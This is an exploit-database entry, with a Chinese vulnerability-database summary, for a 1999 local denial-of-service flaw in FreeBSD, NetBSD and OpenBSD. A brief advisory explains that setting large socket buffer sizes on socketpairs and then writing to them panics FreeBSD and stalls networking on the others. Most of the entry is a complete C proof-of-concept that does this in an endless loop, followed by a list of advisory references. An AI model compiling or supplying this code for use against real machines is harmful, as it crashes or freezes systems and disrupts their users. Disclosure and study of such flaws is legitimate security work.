https://www.exploit-db.com/exploits/19488
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-012

FreeBSD，NetBSD以及OpenBSD存在漏洞。攻击者通过使用socketpair函数创建大量套接字对，并用setsockopt设置大规模缓存并写入内容的方法导致拒绝服务。

source: http://www.securityfocus.com/bid/622/info

A denial of service attack exists that affects FreeBSD, NetBSD and OpenBSD, and potentially other operating systems based in some part on BSD. It is believed that all versions of these operating systems are vulnerable. The vulnerability is related to setting socket options regarding the size of the send and receive buffers on a socketpair. By setting them to certain values, and performing a write the size of the value the options have been set to, FreeBSD can be made to panic. NetBSD and OpenBSD do not panic, but network applications will stop responding.

Details behind why this happens have not been made available. 

#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>

#define BUFFERSIZE 204800

extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];

while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
exit(0);
}

来源:XF
名称:bsd-setsockopt-dos
链接:http://xforce.iss.net/static/3298.php
来源:BUGTRAQ
名称:19990826LocalDoSinFreeBSD
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BUGTRAQ
名称:20000601LocalFreeBSD,Openbsd,NetBSD,DoSVulnerability-MacOSXaffected
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BID
名称:622
链接:http://www.securityfocus.com/bid/622